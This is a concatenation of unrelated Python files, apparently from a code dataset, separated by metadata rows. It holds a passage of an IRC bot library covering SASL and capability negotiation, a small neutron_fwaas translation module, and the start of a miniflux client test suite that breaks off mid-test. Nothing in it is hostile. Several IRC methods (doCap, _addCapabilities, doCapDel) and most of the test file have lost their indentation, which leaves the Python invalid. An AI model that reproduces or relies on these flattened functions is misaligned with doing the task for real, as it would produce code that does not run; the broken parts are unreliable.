            self.sasl_current_mechanism = self.sasl_next_mechanisms.pop(0)
            self.sendMsg(ircmsgs.IrcMsg(command='AUTHENTICATE',
                args=(self.sasl_current_mechanism.upper(),)))
        else:
            self.sasl_current_mechanism = None
            self.endCapabilityNegociation()
    def filterSaslMechanisms(self, available):
        """Drops from our to-try list any mechanism the server does not
        advertise (comparison is case-insensitive)."""
        available = set(map(str.lower, available))
        self.sasl_next_mechanisms = [
            x for x in self.sasl_next_mechanisms
            if x.lower() in available]
    def doAuthenticate(self, msg):
        """Handles AUTHENTICATE from the server: reassembles the (possibly
        multi-message) payload, then answers according to the SASL
        mechanism currently in progress."""
        if not self.authenticate_decoder:
            self.authenticate_decoder = ircutils.AuthenticateDecoder()
        self.authenticate_decoder.feed(msg)
        if not self.authenticate_decoder.ready:
            return # Waiting for other messages
        string = self.authenticate_decoder.get()
        self.authenticate_decoder = None
        mechanism = self.sasl_current_mechanism
        if mechanism == 'ecdsa-nist256p-challenge':
            if string == b'':
                # First round: the server wants to know who we are.
                self.sendSaslString(self.sasl_username.encode('utf-8'))
                return
            # Second round: sign the server's challenge with our key; on
            # any failure, abort this attempt ('*') and fall back.
            try:
                with open(self.sasl_ecdsa_key) as fd:
                    private_key = SigningKey.from_pem(fd.read())
                authstring = private_key.sign(base64.b64decode(msg.args[0].encode()))
                self.sendSaslString(authstring)
            except (BadDigestError, OSError, ValueError):
                self.sendMsg(ircmsgs.IrcMsg(command='AUTHENTICATE',
                    args=('*',)))
                self.tryNextSaslMechanism()
        elif mechanism == 'external':
            # EXTERNAL: identity is taken from the TLS client certificate.
            self.sendSaslString(b'')
        elif mechanism == 'plain':
            # PLAIN payload: authzid NUL authcid NUL password.
            authstring = b'\0'.join([
                self.sasl_username.encode('utf-8'),
                self.sasl_username.encode('utf-8'),
                self.sasl_password.encode('utf-8'),
            ])
            self.sendSaslString(authstring)
    def do903(self, msg):
        """903 (RPL_SASLSUCCESS): authentication succeeded."""
        log.info('%s: SASL authentication successful', self.network)
        self.sasl_authenticated = True
        self.endCapabilityNegociation()
    def do904(self, msg):
        """904 (ERR_SASLFAIL): try the next configured mechanism."""
        log.warning('%s: SASL authentication failed', self.network)
        self.tryNextSaslMechanism()
    def do905(self, msg):
        """905 (ERR_SASLTOOLONG)."""
        log.warning('%s: SASL authentication failed because the username or '
                    'password is too long.', self.network)
        self.tryNextSaslMechanism()
    def do906(self, msg):
        """906 (ERR_SASLABORTED)."""
        log.warning('%s: SASL authentication aborted', self.network)
        self.tryNextSaslMechanism()
    def do907(self, msg):
        """907 (ERR_SASLALREADY)."""
        log.warning('%s: Attempted SASL authentication when we were already '
                    'authenticated.', self.network)
        self.tryNextSaslMechanism()
    def do908(self, msg):
        """908 (RPL_SASLMECHS): server lists the mechanisms it supports."""
        log.info('%s: Supported SASL mechanisms: %s',
                 self.network, msg.args[1])
        self.filterSaslMechanisms(set(msg.args[1].split(',')))
def doCap(self, msg):
subcommand = msg.args[1]
if subcommand == 'ACK':
self.doCapAck(msg)
elif subcommand == 'NAK':
self.doCapNak(msg)
elif subcommand == 'LS':
self.doCapLs(msg)
elif subcommand == 'DEL':
self.doCapDel(msg)
elif subcommand == 'NEW':
self.doCapNew(msg)
    def doCapAck(self, msg):
        """CAP ACK: the server granted the capabilities we requested."""
        if len(msg.args) != 3:
            log.warning('Bad CAP ACK from server: %r', msg)
            return
        caps = msg.args[2].split()
        assert caps, 'Empty list of capabilities'
        log.info('%s: Server acknowledged capabilities: %L',
                 self.network, caps)
        self.state.capabilities_ack.update(caps)
        if 'sasl' in caps:
            # SASL must complete before we may send CAP END.
            self.tryNextSaslMechanism()
        else:
            self.endCapabilityNegociation()
    def doCapNak(self, msg):
        """CAP NAK: the server refused our capability request."""
        if len(msg.args) != 3:
            log.warning('Bad CAP NAK from server: %r', msg)
            return
        caps = msg.args[2].split()
        assert caps, 'Empty list of capabilities'
        self.state.capabilities_nak.update(caps)
        log.warning('%s: Server refused capabilities: %L',
                    self.network, caps)
        self.endCapabilityNegociation()
def _addCapabilities(self, capstring):
for item in capstring.split():
while item.startswith(('=', '~')):
item = item[1:]
if '=' in item:
(cap, value) = item.split('=', 1)
self.state.capabilities_ls[cap] = value
else:
self.state.capabilities_ls[item] = None
    def doCapLs(self, msg):
        """CAP LS reply: records what the server offers, then requests the
        intersection with REQUEST_CAPABILITIES (or finishes negotiation)."""
        if len(msg.args) == 4:
            # Multi-line LS; a '*' marker means more lines will follow.
            if msg.args[2] != '*':
                log.warning('Bad CAP LS from server: %r', msg)
                return
            self._addCapabilities(msg.args[3])
        elif len(msg.args) == 3: # End of LS
            self._addCapabilities(msg.args[2])
            common_supported_capabilities = set(self.state.capabilities_ls) & \
                    self.REQUEST_CAPABILITIES
            if 'sasl' in self.state.capabilities_ls:
                s = self.state.capabilities_ls['sasl']
                if s is not None:
                    # cap-3.2 servers advertise sasl=<mechanism list>.
                    self.filterSaslMechanisms(set(s.split(',')))
            if 'starttls' not in self.state.capabilities_ls and \
                    self.requireStarttls:
                log.error('%s: Server does not support STARTTLS.', self.network)
                self.feedMsg(ircmsgs.error('STARTTLS upgrade not supported '
                    'by the server'))
                self.die()
                return
            # NOTE: Capabilities are requested in alphabetic order, because
            # sets are unordered, and their "order" is nondeterministic.
            # This is needed for the tests.
            if common_supported_capabilities:
                caps = ' '.join(sorted(common_supported_capabilities))
                self.sendMsg(ircmsgs.IrcMsg(command='CAP',
                    args=('REQ', caps)))
            else:
                self.endCapabilityNegociation()
        else:
            log.warning('Bad CAP LS from server: %r', msg)
            return
def doCapDel(self, msg):
if len(msg.args) != 3:
log.warning('Bad CAP DEL from server: %r', msg)
return
caps = msg.args[2].split()
assert caps, 'Empty list of capabilities'
for cap in caps:
# The spec says "If capability negotiation 3.2 was used, extensions
# listed MAY contain values." for CAP NEW and CAP DEL
cap = cap.split('=')[0]
try:
del self.state.capabilities_ls[cap]
except KeyError:
pass
try:
self.state.capabilities_ack.remove(cap)
except KeyError:
pass
    def doCapNew(self, msg):
        """CAP NEW: the server now offers additional capabilities; request
        any we want and were not already granted, and retry SASL if it
        just became available."""
        if len(msg.args) != 3:
            log.warning('Bad CAP NEW from server: %r', msg)
            return
        caps = msg.args[2].split()
        assert caps, 'Empty list of capabilities'
        self._addCapabilities(msg.args[2])
        if not self.sasl_authenticated and 'sasl' in self.state.capabilities_ls:
            self.resetSasl()
            s = self.state.capabilities_ls['sasl']
            if s is not None:
                self.filterSaslMechanisms(set(s.split(',')))
        common_supported_unrequested_capabilities = (
            set(self.state.capabilities_ls) &
            self.REQUEST_CAPABILITIES -
            self.state.capabilities_ack)
        if common_supported_unrequested_capabilities:
            caps = ' '.join(sorted(common_supported_unrequested_capabilities))
            self.sendMsg(ircmsgs.IrcMsg(command='CAP',
                args=('REQ', caps)))
    def monitor(self, targets):
        """Increment a counter of how many callbacks monitor each target;
        and send a MONITOR + to the server if the target is not yet
        monitored.

        Returns the set of targets that were actually sent to the server."""
        if isinstance(targets, str):
            targets = [targets]
        not_yet_monitored = set()
        for target in targets:
            if target in self.monitoring:
                self.monitoring[target] += 1
            else:
                not_yet_monitored.add(target)
                self.monitoring[target] = 1
        if not_yet_monitored:
            self.queueMsg(ircmsgs.monitor('+', not_yet_monitored))
        return not_yet_monitored
    def unmonitor(self, targets):
        """Decrements a counter of how many callbacks monitor each target;
        and send a MONITOR - to the server if the counter drops to 0.

        NOTE(review): raises KeyError for a target that was never passed
        to monitor() -- callers must keep calls balanced."""
        if isinstance(targets, str):
            targets = [targets]
        should_be_unmonitored = set()
        for target in targets:
            self.monitoring[target] -= 1
            if self.monitoring[target] == 0:
                del self.monitoring[target]
                should_be_unmonitored.add(target)
        if should_be_unmonitored:
            self.queueMsg(ircmsgs.monitor('-', should_be_unmonitored))
        return should_be_unmonitored
    def _getNextNick(self):
        # Picks the next nick to try when ours is rejected: first the
        # configured alternates (any '%s' is replaced with the base nick),
        # then the base nick padded to >3 chars with random digits swapped
        # in until it differs from the original.
        if self.alternateNicks:
            nick = self.alternateNicks.pop(0)
            if '%s' in nick:
                network_nick = conf.supybot.networks.get(self.network).nick()
                if network_nick == '':
                    nick %= conf.supybot.nick()
                else:
                    nick %= network_nick
            return nick
        else:
            nick = conf.supybot.nick()
            network_nick = conf.supybot.networks.get(self.network).nick()
            if network_nick != '':
                nick = network_nick
            ret = nick
            L = list(nick)
            while len(L) <= 3:
                L.append('`')
            while ircutils.strEqual(ret, nick):
                L[random.randrange(len(L))] = utils.iter.choice('0123456789')
                ret = ''.join(L)
            return ret
    def do002(self, msg):
        """Logs the ircd version."""
        (beginning, version) = rsplit(msg.args[-1], maxsplit=1)
        log.info('Server %s has version %s', self.server, version)
    def doPing(self, msg):
        """Handles PING messages."""
        self.sendMsg(ircmsgs.pong(msg.args[0]))
    def doPong(self, msg):
        """Handles PONG messages."""
        self.outstandingPing = False
    def do376(self, msg):
        """End of MOTD: we are now fully connected; send user modes."""
        log.info('Got end of MOTD from %s', self.server)
        self.afterConnect = True
        # Let's reset nicks in case we had to use a weird one.
        self.alternateNicks = conf.supybot.nick.alternates()[:]
        umodes = conf.supybot.networks.get(self.network).umodes()
        if umodes == '':
            umodes = conf.supybot.protocols.irc.umodes()
        supported = self.state.supported.get('umodes')
        if supported:
            # Only send modes the server says it understands.
            acceptedchars = supported.union('+-')
            umodes = ''.join([m for m in umodes if m in acceptedchars])
        if umodes:
            log.info('Sending user modes to %s: %s', self.network, umodes)
            self.sendMsg(ircmsgs.mode(self.nick, umodes))
    # 377 and 422 (no MOTD) also mark the end of registration.
    do377 = do422 = do376
    def do43x(self, msg, problem):
        # Common handler for nick-rejection numerics (432/433/437): pick
        # another nick, but only while we are still registering.
        if not self.afterConnect:
            newNick = self._getNextNick()
            assert newNick != self.nick
            log.info('Got %s: %s %s. Trying %s.',
                     msg.command, self.nick, problem, newNick)
            self.sendMsg(ircmsgs.nick(newNick))
    def do437(self, msg):
        self.do43x(msg, 'is temporarily unavailable')
    def do433(self, msg):
        self.do43x(msg, 'is in use')
    def do432(self, msg):
        self.do43x(msg, 'is not a valid nickname')
    def doJoin(self, msg):
        """On our own JOIN, start channel sync: WHOX for hostmasks, MODE
        for channel modes, and MODE +b for the ban list."""
        if msg.nick == self.nick:
            channel = msg.args[0]
            self.queueMsg(ircmsgs.who(channel, args=('%tuhna,1',))) # Ends with 315.
            self.queueMsg(ircmsgs.mode(channel)) # Ends with 329.
            for channel in msg.args[0].split(','):
                self.queueMsg(ircmsgs.mode(channel, '+b'))
            # NOTE(review): uses the leaked loop variable, so with several
            # channels only the last one gets a sync timestamp -- confirm.
            self.startedSync[channel] = time.time()
    def do315(self, msg):
        """End of WHO: the channel sync started in doJoin is complete."""
        channel = msg.args[1]
        if channel in self.startedSync:
            now = time.time()
            started = self.startedSync.pop(channel)
            elapsed = now - started
            log.info('Join to %s on %s synced in %.2f seconds.',
                     channel, self.network, elapsed)
    def doError(self, msg):
        """Handles ERROR messages, reconnecting on the recoverable ones."""
        log.warning('Error message from %s: %s', self.network, msg.args[0])
        if not self.zombie:
            if msg.args[0].lower().startswith('closing link'):
                self.driver.reconnect()
            elif 'too fast' in msg.args[0]: # Connecting too fast.
                self.driver.reconnect(wait=True)
    def doNick(self, msg):
        """Handles NICK messages."""
        if msg.nick == self.nick:
            # Our own nick changed; update nick and prefix.
            newNick = msg.args[0]
            self.nick = newNick
            (nick, user, domain) = ircutils.splitHostmask(msg.prefix)
            self.prefix = ircutils.joinHostmask(self.nick, user, domain)
        elif conf.supybot.followIdentificationThroughNickChanges():
            # We use elif here because this means it's someone else's nick
            # change, not our own.
            try:
                id = ircdb.users.getUserId(msg.prefix)
                u = ircdb.users.getUser(id)
            except KeyError:
                return
            if u.auth:
                # Rewrite any auth entry matching the old hostmask so the
                # user stays identified under the new nick.
                (_, user, host) = ircutils.splitHostmask(msg.prefix)
                newhostmask = ircutils.joinHostmask(msg.args[0], user, host)
                for (i, (when, authmask)) in enumerate(u.auth[:]):
                    if ircutils.strEqual(msg.prefix, authmask):
                        log.info('Following identification for %s: %s -> %s',
                                 u.name, authmask, newhostmask)
                        u.auth[i] = (u.auth[i][0], newhostmask)
                ircdb.users.setUser(u)
    def _reallyDie(self):
        """Makes the Irc object die.  Dead."""
        log.info('Irc object for %s dying.', self.network)
        # XXX This hasattr should be removed, I'm just putting it here because
        # we're so close to a release.  After 0.80.0 we should remove this
        # and fix whatever AttributeErrors arise in the drivers themselves.
        if self.driver is not None and hasattr(self.driver, 'die'):
            self.driver.die()
        if self in world.ircs:
            world.ircs.remove(self)
            # Only kill the callbacks if we're the last Irc.
            if not world.ircs:
                for cb in self.callbacks:
                    cb.die()
                # If we shared our list of callbacks, this ensures that
                # cb.die() is only called once for each callback.  It's
                # not really necessary since we already check to make sure
                # we're the only Irc object, but a little robustitude never
                # hurt anybody.
                log.debug('Last Irc, clearing callbacks.')
                self.callbacks[:] = []
        else:
            log.warning('Irc object killed twice: %s', utils.stackTrace())
    def __hash__(self):
        # Identity-based hash, consistent with __eq__ below.
        return id(self)
    def __eq__(self, other):
        # We check isinstance here, so that if some proxy object (like those
        # defined in callbacks.py) has overridden __eq__, it takes precedence.
        if isinstance(other, self.__class__):
            return id(self) == id(other)
        else:
            return other.__eq__(self)
    def __ne__(self, other):
        return not (self == other)
    def __str__(self):
        return 'Irc object for %s' % self.network
    def __repr__(self):
        return '<irclib.Irc object for %s>' % self.network
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| 38.595075 | 89 | 0.569791 |
e28f5752220298bd5700ddb11e2e0387bfcef44f | 1,055 | py | Python | neutron_fwaas/_i18n.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | 1 | 2019-03-18T08:55:55.000Z | 2019-03-18T08:55:55.000Z | neutron_fwaas/_i18n.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | neutron_fwaas/_i18n.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import oslo_i18n
# Translation domain for this package's message catalogs.
DOMAIN = "neutron_fwaas"
_translators = oslo_i18n.TranslatorFactory(domain=DOMAIN)
# The primary translation function using the well-known name "_"
_ = _translators.primary
# The contextual translation function using the name "_C"
_C = _translators.contextual_form
# The plural translation function using the name "_P"
_P = _translators.plural_form
def get_available_languages():
    """Return the languages for which this domain has translations."""
    return oslo_i18n.get_available_languages(DOMAIN)
| 31.969697 | 78 | 0.758294 |
20a3a4a6159570926de6c0b986c4973c77ca93f9 | 28,800 | py | Python | tests/test_client.py | miniflux/python-client | 5eef3e5d86b94c19b3fb52b1ec1190cf6f12c719 | [
"MIT"
] | 25 | 2019-08-15T19:08:57.000Z | 2022-03-17T13:21:07.000Z | tests/test_client.py | miniflux/python-client | 5eef3e5d86b94c19b3fb52b1ec1190cf6f12c719 | [
"MIT"
] | null | null | null | tests/test_client.py | miniflux/python-client | 5eef3e5d86b94c19b3fb52b1ec1190cf6f12c719 | [
"MIT"
] | 2 | 2020-07-15T00:06:26.000Z | 2021-11-11T13:29:14.000Z | # The MIT License (MIT)
#
# Copyright (c) 2018-2020 Frederic Guillot
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import json
import time
import unittest
from unittest import mock
import miniflux
from miniflux import ClientError
from requests.exceptions import Timeout
class TestMinifluxClient(unittest.TestCase):
    def test_get_error_reason(self):
        # ClientError should surface the server-provided error_message.
        response = mock.Mock()
        response.status_code = 404
        response.json.return_value = {'error_message': 'some error'}
        error = ClientError(response)
        self.assertEqual(error.status_code, 404)
        self.assertEqual(error.get_error_reason(), 'some error')
    def test_get_error_without_reason(self):
        # Without an error_message key, the reason falls back to the
        # HTTP status code.
        response = mock.Mock()
        response.status_code = 404
        response.json.return_value = {}
        error = ClientError(response)
        self.assertEqual(error.status_code, 404)
        self.assertEqual(error.get_error_reason(), 'status_code=404')
    def test_get_error_with_bad_response(self):
        # A non-object JSON body must not crash the reason lookup.
        response = mock.Mock()
        response.status_code = 404
        response.json.return_value = None
        error = ClientError(response)
        self.assertEqual(error.status_code, 404)
        self.assertEqual(error.get_error_reason(), 'status_code=404')
    def test_base_url_with_trailing_slash(self):
        # A trailing slash on the base URL must not produce a double slash
        # in the endpoint URL.
        requests = _get_request_mock()
        expected_result = [{"url": "http://example.org/feed", "title": "Example", "type": "RSS"}]
        response = mock.Mock()
        response.status_code = 200
        response.json.return_value = expected_result
        requests.post.return_value = response
        client = miniflux.Client("http://localhost/", "username", "password")
        result = client.discover("http://example.org/")
        requests.post.assert_called_once_with('http://localhost/v1/discover',
                                              headers=None,
                                              auth=('username', 'password'),
                                              data=mock.ANY,
                                              timeout=30)
        self.assertEqual(result, expected_result)
    def test_get_me(self):
        # me() hits GET /v1/me and returns the decoded JSON body.
        requests = _get_request_mock()
        expected_result = {"id": 123, "username": "foobar"}
        response = mock.Mock()
        response.status_code = 200
        response.json.return_value = expected_result
        requests.get.return_value = response
        client = miniflux.Client("http://localhost", "username", "password")
        result = client.me()
        requests.get.assert_called_once_with('http://localhost/v1/me',
                                             headers=None,
                                             auth=('username', 'password'),
                                             timeout=30)
        self.assertEqual(result, expected_result)
    def test_get_me_with_server_error(self):
        # A 5xx response is surfaced as a ClientError.
        requests = _get_request_mock()
        response = mock.Mock()
        response.status_code = 500
        requests.get.return_value = response
        client = miniflux.Client("http://localhost", "username", "password")
        with self.assertRaises(ClientError):
            client.me()
def test_discover(self):
requests = _get_request_mock()
expected_result = [{"url": "http://example.org/feed", "title": "Example", "type": "RSS"}]
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.discover("http://example.org/")
requests.post.assert_called_once_with('http://localhost/v1/discover',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.post.call_args
payload = json.loads(kwargs.get('data'))
self.assertEqual(payload.get('url'), "http://example.org/")
self.assertIsNone(payload.get('username'))
self.assertIsNone(payload.get('password'))
self.assertEqual(result, expected_result)
def test_discover_with_credentials(self):
requests = _get_request_mock()
expected_result = [{"url": "http://example.org/feed", "title": "Example", "type": "RSS"}]
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.discover("http://example.org/", username="foobar", password="secret", user_agent="Bot")
requests.post.assert_called_once_with('http://localhost/v1/discover',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.post.call_args
payload = json.loads(kwargs.get('data'))
self.assertEqual(payload.get('url'), "http://example.org/")
self.assertEqual(payload.get('username'), "foobar")
self.assertEqual(payload.get('password'), "secret")
self.assertEqual(payload.get('user_agent'), "Bot")
self.assertEqual(result, expected_result)
def test_discover_with_server_error(self):
requests = _get_request_mock()
expected_result = {'error_message': 'some error'}
response = mock.Mock()
response.status_code = 500
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
with self.assertRaises(ClientError):
client.discover("http://example.org/")
def test_export(self):
requests = _get_request_mock()
expected_result = "OPML feed"
response = mock.Mock()
response.status_code = 200
response.text = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.export()
requests.get.assert_called_once_with('http://localhost/v1/export',
headers=None,
auth=('username', 'password'),
timeout=30)
self.assertEqual(result, expected_result)
def test_import(self):
requests = _get_request_mock()
input_data = "my opml data"
response = mock.Mock()
response.status_code = 201
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
client.import_feeds(input_data)
requests.post.assert_called_once_with('http://localhost/v1/import',
headers=None,
data=input_data,
auth=('username', 'password'),
timeout=30)
def test_import_failure(self):
requests = _get_request_mock()
input_data = "my opml data"
response = mock.Mock()
response.status_code = 500
response.json.return_value = {"error_message": "random error"}
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
with self.assertRaises(ClientError):
client.import_feeds(input_data)
requests.post.assert_called_once_with('http://localhost/v1/import',
headers=None,
data=input_data,
auth=('username', 'password'),
timeout=30)
def test_get_feed(self):
requests = _get_request_mock()
expected_result = {"id": 123, "title": "Example"}
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_feed(123)
requests.get.assert_called_once_with('http://localhost/v1/feeds/123',
headers=None,
auth=('username', 'password'),
timeout=30)
self.assertEqual(result, expected_result)
def test_create_feed(self):
requests = _get_request_mock()
expected_result = {"feed_id": 42}
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.create_feed("http://example.org/feed", 123)
requests.post.assert_called_once_with('http://localhost/v1/feeds',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.post.call_args
payload = json.loads(kwargs.get('data'))
self.assertEqual(payload.get('feed_url'), "http://example.org/feed")
self.assertEqual(payload.get('category_id'), 123)
self.assertIsNone(payload.get('username'))
self.assertIsNone(payload.get('password'))
self.assertIsNone(payload.get('crawler'))
self.assertEqual(result, expected_result['feed_id'])
def test_create_feed_with_credentials(self):
requests = _get_request_mock()
expected_result = {"feed_id": 42}
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.create_feed("http://example.org/feed", 123, username="foobar", password="secret")
requests.post.assert_called_once_with('http://localhost/v1/feeds',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.post.call_args
payload = json.loads(kwargs.get('data'))
self.assertEqual(payload.get('feed_url'), "http://example.org/feed")
self.assertEqual(payload.get('category_id'), 123)
self.assertEqual(payload.get('username'), "foobar")
self.assertEqual(payload.get('password'), "secret")
self.assertIsNone(payload.get('crawler'))
self.assertEqual(result, expected_result['feed_id'])
def test_create_feed_with_crawler_enabled(self):
requests = _get_request_mock()
expected_result = {"feed_id": 42}
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.create_feed("http://example.org/feed", 123, crawler=True)
requests.post.assert_called_once_with('http://localhost/v1/feeds',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.post.call_args
payload = json.loads(kwargs.get('data'))
self.assertEqual(payload.get('feed_url'), "http://example.org/feed")
self.assertEqual(payload.get('category_id'), 123)
self.assertIsNone(payload.get('username'))
self.assertIsNone(payload.get('password'))
self.assertTrue(payload.get('crawler'))
self.assertEqual(result, expected_result['feed_id'])
def test_create_feed_with_custom_user_agent_and_crawler_disabled(self):
requests = _get_request_mock()
expected_result = {"feed_id": 42}
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.post.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.create_feed("http://example.org/feed", 123, crawler=False, user_agent="GoogleBot")
requests.post.assert_called_once_with('http://localhost/v1/feeds',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.post.call_args
payload = json.loads(kwargs.get('data'))
self.assertEqual(payload.get('feed_url'), "http://example.org/feed")
self.assertEqual(payload.get('category_id'), 123)
self.assertIsNone(payload.get('username'))
self.assertIsNone(payload.get('password'))
self.assertFalse(payload.get('crawler'))
self.assertEqual(payload.get('user_agent'), "GoogleBot")
self.assertEqual(result, expected_result['feed_id'])
def test_update_feed(self):
requests = _get_request_mock()
expected_result = {"id": 123, "crawler": True, "username": "test"}
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.put.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.update_feed(123, crawler=True, username="test")
requests.put.assert_called_once_with('http://localhost/v1/feeds/123',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.put.call_args
payload = json.loads(kwargs.get('data'))
self.assertNotIn('feed_url', payload)
self.assertNotIn('category_id', payload)
self.assertEqual(payload.get('username'), "test")
self.assertTrue(payload.get('crawler'))
self.assertEqual(result, expected_result)
def test_refresh_all_feeds(self):
requests = _get_request_mock()
expected_result = True
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.put.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.refresh_all_feeds()
requests.put.assert_called_once_with('http://localhost/v1/feeds/refresh',
headers=None,
auth=('username', 'password'),
timeout=30)
assert result == expected_result
def test_refresh_feed(self):
requests = _get_request_mock()
expected_result = True
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.put.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.refresh_feed(123)
requests.put.assert_called_once_with('http://localhost/v1/feeds/123/refresh',
headers=None,
auth=('username', 'password'),
timeout=30)
assert result == expected_result
def test_get_feed_entries(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_feed_entries(123)
requests.get.assert_called_once_with('http://localhost/v1/feeds/123/entries',
headers=None,
auth=('username', 'password'),
params=None,
timeout=30)
assert result == expected_result
def test_get_feed_entries_with_direction_param(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_feed_entries(123, direction='asc')
requests.get.assert_called_once_with('http://localhost/v1/feeds/123/entries',
headers=None,
auth=('username', 'password'),
params={'direction': 'asc'},
timeout=30)
assert result == expected_result
def test_mark_feed_as_read(self):
requests = _get_request_mock()
response = mock.Mock()
response.status_code = 204
requests.put.return_value = response
client = miniflux.Client("http://localhost", api_key="secret")
client.mark_feed_entries_as_read(123)
requests.put.assert_called_once_with('http://localhost/v1/feeds/123/mark-all-as-read',
headers={'X-Auth-Token': 'secret'},
auth=None,
timeout=30)
def test_mark_category_entries_as_read(self):
requests = _get_request_mock()
response = mock.Mock()
response.status_code = 204
requests.put.return_value = response
client = miniflux.Client("http://localhost", api_key="secret")
client.mark_category_entries_as_read(123)
requests.put.assert_called_once_with('http://localhost/v1/categories/123/mark-all-as-read',
headers={'X-Auth-Token': 'secret'},
auth=None,
timeout=30)
def test_mark_user_entries_as_read(self):
requests = _get_request_mock()
response = mock.Mock()
response.status_code = 204
requests.put.return_value = response
client = miniflux.Client("http://localhost", api_key="secret")
client.mark_user_entries_as_read(123)
requests.put.assert_called_once_with('http://localhost/v1/users/123/mark-all-as-read',
headers={'X-Auth-Token': 'secret'},
auth=None,
timeout=30)
def test_get_entry(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_entry(123)
requests.get.assert_called_once_with('http://localhost/v1/entries/123',
headers=None,
auth=('username', 'password'),
timeout=30)
assert result == expected_result
def test_get_entries(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_entries(status='unread', limit=10, offset=5)
requests.get.assert_called_once_with('http://localhost/v1/entries',
headers=None,
auth=('username', 'password'),
params=mock.ANY,
timeout=30)
assert result == expected_result
def test_get_entries_with_before_param(self):
param_value = int(time.time())
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_entries(before=param_value)
requests.get.assert_called_once_with('http://localhost/v1/entries',
headers=None,
auth=('username', 'password'),
params={'before': param_value},
timeout=30)
assert result == expected_result
def test_get_entries_with_starred_param(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_entries(starred=True)
requests.get.assert_called_once_with('http://localhost/v1/entries',
headers=None,
auth=('username', 'password'),
params={'starred': True},
timeout=30)
assert result == expected_result
def test_get_entries_with_starred_param_at_false(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
